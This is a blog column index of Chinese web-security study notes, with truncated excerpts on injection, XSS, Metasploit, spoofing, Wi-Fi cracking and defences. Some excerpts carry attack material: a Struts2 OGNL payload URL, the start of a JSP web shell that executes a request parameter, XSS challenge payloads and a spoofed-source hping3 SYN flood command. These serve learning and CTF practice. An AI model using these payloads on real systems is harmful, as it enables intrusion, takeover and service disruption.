
Web安全
文章平均质量分 51
CN_CodeLab
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
解析漏洞总结
怎么看网站搭建平台seo查询工具查询(扫描工具(wwwscan,wvs,破壳等))手工查询(判断大小写,服务器系统)index.asp INDEX.ASP 6.0:文件形式和文件夹形式文件形式:x.asp => x.asp;x.jpg(gif,txt,png等) asp执行http://www.xxx.com//Uplod/image/x.asp;1.j转载 2016-06-02 16:41:23 · 474 阅读 · 0 评论 -
Mbox沙箱
Mbox是一种轻量级的沙箱机制,它允许任何用户在没有特殊权限的条件下运行程序Debian条件下安装wget http://pdos.csail.mit.edu/mbox/mbox-latest-amd64.deb sudo dpkg -i mbox-latest-amd64.debUsage 1: Installing packages without root$ mbox -R – apt-ge翻译 2016-08-26 17:37:00 · 1279 阅读 · 0 评论 -
IDS/IPS等安全概念
IDS(intrusion detection system),即入侵检测系统。是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。IPS(Intrusion Prevention System)即入侵防御系统。IPS位于防火墙和网络的设备之间。这样,如果检测到攻击,IPS会在这种攻击扩散原创 2016-08-22 10:06:41 · 5581 阅读 · 0 评论 -
Armitage
msf连接数据库启动postgresql 服务: service postgresql start 进入 postgres: su postgres 输入如下命令创建一个postgresql数据库账户: createuser msf3 –P命令中的msf3就是要创建的用户,当然你可以输入任何其他用户名。接着,终端中会提示你输入密码,然后确认密码,这里我设置密码为“msf3”。然后询问你该账转载 2016-08-29 11:23:54 · 1115 阅读 · 0 评论 -
Metasploit 手动更新漏洞库及之后Armitage的配置
没想到大部分的时间都花费在了这种地方 (┭┮﹏┭┮)在kali2.0中msfupdate并不能更新漏洞库,需要从https://www.rapid7.com/products/metasploit/download.jsp 下载Metasploit的安装包进行更新,更新完成后打开Metasploit并使用version或者show exploits查看更新之后的版本或者更新的exploits I原创 2016-08-30 14:10:20 · 19355 阅读 · 0 评论 -
SQL注入
1注入类型 1.1数字型注入 查询方式: select * from 表名 where 字段名=数字 检测漏洞: select * from 表名 where 字段名=数字 AND 1=1 select * from 表名 where 字段名=数字 AND 1=2 1.2字符型注入 查询方式: se原创 2016-06-01 20:55:52 · 575 阅读 · 0 评论 -
ARP欺骗,嗅探,DNS欺骗,Session劫持
ARP欺骗使用工具ettercapvim /etc/NetworkManager/NetworkManager.conf #修改配置将manager改为true service network-manager restart #重启配置vim /etc/ettercap/etter.conf #配置ettercapec_uid=0 ec_gid=0 linux中 if you use ipta原创 2016-08-17 09:18:54 · 2618 阅读 · 0 评论 -
Struts2 payload
Struts2S-016/S-017http://****.do?redirect:${%23w%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23w.println(%27it%20is%20vulerable.%27),%23w.flush(),%23w.cl原创 2016-09-02 17:14:39 · 2098 阅读 · 0 评论 -
反弹Shell总结
jsp shell<%@ page import="java.io.*" %><% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre原创 2016-09-05 10:02:51 · 838 阅读 · 0 评论 -
拒绝服务攻击与周边
hping3使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000 #-I 网络接口地址 -a 伪造ip地址,防火墙就不会记录你的真实ip了,当然回应的包也无法接收了 -S原创 2016-10-11 15:18:32 · 405 阅读 · 0 评论 -
Chrome浏览器导入Burp Suite证书
chrome设置好代理之后Burp Suite 只能抓取http包,想要抓取https包还要在chrome安装Burp Suite的证书才可以正常抓取,百度了下竟然没有一篇能用的中文教程,真是浪费时间,我把我的添加证书的过程贴下来,供大家参考在代理栏中打开 导入/导出 按钮 选择第一个选项并保存在本地 打开Chrome浏览器的设置选项,找到管理证书的按钮 在受信任一栏中选择导入,将刚才保存在本地的原创 2016-06-04 20:20:56 · 60567 阅读 · 8 评论 -
防御手段总结
Xss防御httponly:在cookie中加入httponly,防止javascript读取cookie输入检查输出检查安全编码函数CSRF防御验证码referer check:检查发送请求的页面token:请求加密使攻击者无法得知url地址改为post请求?(这个是自己想到的)SQL注入防御预编译:绑定变量,告诉服务器哪些是变量及查询的语句检查数据类型使用安全函数DD原创 2016-07-25 17:40:52 · 474 阅读 · 0 评论 -
sqli labs通关秘籍
lession 5子查询Select concat((select database()));注意不要写错。上述查询中,红色部分就是子查询,它会首先被评估。rand()函数随机生成0-1之间的一个数: select rand()原创 2016-06-17 11:14:20 · 1962 阅读 · 0 评论 -
Xss challenges writeup
Stage #1非常简单,不用多说答案:"</b><script>alert(document.domain);</script>Stage #2属于输入框中的Xss,可以选择闭合标签 或者类似<input type="text" onmouseover="alert(1)">答案:aaa"><script>alert(document.domain);</script> 或者:" onclic原创 2017-03-06 20:31:53 · 1044 阅读 · 0 评论 -
prompt(1) to win writeup
0没有任何过滤"><script>prompt(1)</script> 或者 "><svg/onload=prompt(1)>1过滤了大于号>,采用注释符//绕过aa<svg/onload=prompt(1)//2过滤了左括号(,使用<svg>标签绕过。在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此((十六进制)或者((十进制)或者转载 2017-04-05 22:14:19 · 2273 阅读 · 0 评论 -
初探Metasploit的自动攻击
这篇文章来得有点晚,竟然比初探Meterpreter还晚总之就是见谅了,理论上应该得比它早发出来的本文很坎坷,因为考研耽误了几天。。因为生病耽误了几天。。因为朋友来找我玩耽误了几天。。事先说明,本文实在BT5r3下实现的很抱歉,没get shell,不过介绍手法这一目的应该达到了。============================================================转载 2017-07-12 10:53:35 · 2008 阅读 · 0 评论 -
密码逻辑总结
密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码密码找回凭证在客户端获取。例如:在密码找回时注意抓包查看所有url返回响应等,看是否有最终的凭证出现,这样就可以绕过手机或者安全邮箱了。密码找回凭证在页面中可以直接获取,例子:密码答案竟然在源码中有体现Cookie混淆密码找回凭证可以比较容易的猜出。例如:发到邮箱中修改密码的url被猜出密码找回凭证存并非只是与单个用户并原创 2016-07-12 21:03:50 · 3198 阅读 · 0 评论 -
SQL语句总结
创建数据库create database databasename删除数据库drop database databasename使用数据库use databasename插入数据insert into users(NAME,age) values("这里是姓名",23)删除数据delete from users where NAME="这里是姓名"修改数据update users set NAME原创 2016-08-05 13:21:20 · 300 阅读 · 0 评论 -
Socket, WebSocket
WebSocket与http协议一样,是一套应用层协议全双工通信,服务端可直接向客户端发送信息比http更小的首部建立在http协议之上,建立连接时首先发送http请求,请求进行Socket通信,建立完成之后双方方可WebSocket通信HTTP、WebSocket 等应用层协议,都是基于 TCP 协议来传输数据对于 WebSocket 来说,它必须依赖 HTTP 协议进行一次握手,握手原创 2016-06-08 10:41:41 · 540 阅读 · 0 评论 -
SSL/TLS协议笔记
http,https与sslhttps就是在http上面加了一层ssl协议,在http站点上部署SSL数字证书就变成了https 运行过程SSL/TLS协议的基本思路是采用公钥加密法,也就是说,客户端先向服务器端索要公钥,然后用公钥加密信息,服务器收到密文后,用自己的私钥解密。 如何保证公钥不被篡改将公钥放在数字证书中。只要证书是可信的,公钥就是可信的。 公钥加密计算量太大,如何减少耗用的时间转载 2016-06-08 13:30:11 · 667 阅读 · 0 评论 -
Session , Cookie, Token
Session , Cookie, Tokenhttp为无状态协议,用户的登录状态无法通过协议层面保存下来,因此一般使用icookie管理session一个cookie的设置以及发送过程安全手段:cookie和表头其他字段共同管理session 你可能会说,居然攻击者能获得有效的session id,那么以他的水平,伪造一个相同的User-Agent不是件难事。不错,但是我们可以说这至少给他添加了原创 2016-06-07 17:43:53 · 1088 阅读 · 0 评论 -
OWASP TOP 10 (2013)
1. 注入注入攻击漏洞,例如SQL,OS 以及LDAP注入。这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候。攻击者发送的恶意数据可以欺骗解释器,以执行计划外的命令或者在未被恰当授权时访问数据。2. 失效的身份认证和会话管理身份认证:最常见的是登录功能,往往是提交用户名和密码,在安全性要求更高得情况下,有防止密码暴力破解的验证码,基于用户端的证书,物理口令卡等会话管理:原创 2016-06-26 20:49:51 · 1667 阅读 · 0 评论 -
URL编码问题
URL为何需要编码对于Url来说,之所以要进行编码,是因为Url中有些字符会引起歧义。URL中采用何种编码Url的编码格式采用的是ASCII码,而不是Unicode,这也就是说你不能在Url中包含任何非ASCII字符 Url中只允许包含英文字母(a-zA-Z)、数字(0-9)、-_.~4个特殊字符以及所有保留字符。如何对URL编码例如a在US-ASCII码中对应的字节是0x61,那么Url编码原创 2016-06-13 13:10:17 · 1273 阅读 · 0 评论 -
杂乱总结
信息安全意义上的0Day信息安全意义上的0Day是指在系统商在知晓并发布相关补丁前就被掌握或者公开的漏洞信息。缓冲区溢出原理通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。 下面通过一个示例来详细看看什么是缓冲区溢出。程序的缓冲区就像一个个格子,每个格子中存放原创 2016-07-02 19:56:01 · 431 阅读 · 0 评论 -
Metasploit Framework 总结
2.Metesploit Framework 基础知识调用 exploit漏洞用use 使用payload用set 参数也是用set启动:命令行输入:msfconsole命令行输入:msfcli +参数图形化界面输入:armitage3.实例讲解1 ms10_046快捷方式图标漏洞命令行msfconsole use exploit/windows/browser/ms10_046_sh原创 2016-07-02 17:12:33 · 787 阅读 · 0 评论 -
Xss总结
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);>2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。3. 输出在HTML属性里的情况有时候,输原创 2016-06-13 17:05:46 · 832 阅读 · 0 评论 -
网站渗透测试原理及详细过程
网站渗透测试原理及详细过程原文地址:http://blog.youkuaiyun.com/kingmax54212008/article/details/11833059渗透测试(Penetration Testing)目录零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集 零、前转载 2016-07-05 21:04:40 · 6389 阅读 · 0 评论 -
SQL注入总结
/**/与/!**//* …. / 在大部分语言中都一样是注释。这个之中的语句是不被执行的。但MYSQL中 为了保持兼容,比如从mysqldump 导出的SQL语句能被其它数据库直接使用,它把一些特有的仅在MYSQL上的语句放在 /! … */ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中它会执行。 仅当MySQL的版本等于或高于指定的版本号时才会执行注释中的语法: CREA原创 2016-06-06 15:48:58 · 780 阅读 · 0 评论 -
Aircrack-ng破解wifi实战
参考:http://www.jianshu.com/p/d4da13258f35工具及作用:Airodump-ng 获取 AP 的 MAC 信息,连接信息以及是否握手成功。 Aircrack-ng 支持基于 802.11 协议的 WEP 和 WPA/WPA2-PSK 密码破解 Aireplay-ng 强行向目标 AP 发送数据包 Airmon-ng 开启无线网卡的监视模式 Wordlists原创 2016-08-14 21:11:54 · 3171 阅读 · 3 评论 -
Google hack总结
模糊搜索 kali总结精准搜索 "kali总结"通配符 谷歌的通配符是星号“*”,必须在精确搜索符双引号内部使用。用通配符代替关键词或短语中无法确定的字词。 "kali×总结"匹配字符 "kali.总结"约束条件 加号“+”用于强制搜索,即必须包含加号后的内容。一般与精确搜索符一起应用。 "kali+总结"intitle:标题中搜索intext:文本中搜索inurl:ur原创 2016-08-04 16:27:27 · 392 阅读 · 0 评论 -
文件包含漏洞
什么是文件包含漏洞?简单的来说,就是我们用一个可控的变量作为文件名并以文件包含的的方式调用了它,漏洞就产生了。以PHP为例文件包含漏洞可以分为RFI(远程文件包含)和LFI(本地文件包含漏洞)两种。而区分他们最简单的方法就是php.ini中是否开启了allow_url_include。如果开启了我们就有可能包含远程文件,如果不是我们有可能包含本地的文件。 文件包含分为 自定义扩展名和 程序中已定义原创 2016-07-21 21:10:56 · 1046 阅读 · 0 评论 -
Kali下建立钓鱼热点
使用工具:isc-dhcp-serverAircrack-ng套件iptables首先写dhcp配置文件/etc/dhcp/dhcpd.conf authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;o原创 2016-08-16 15:53:14 · 2891 阅读 · 2 评论 -
使用python编写BurpSuite插件(1. demo运行)
安装python开发的扩展需要配置Jython环境。Jython下载直接下载Standalone Jar版本就可以(地址:http://www.jython.org/downloads.html)。导入jar包 下载插件demo (地址:https://github.com/PortSwigger/example-hello-world/blob/master/python/HelloWorld.原创 2017-08-18 17:31:13 · 5298 阅读 · 0 评论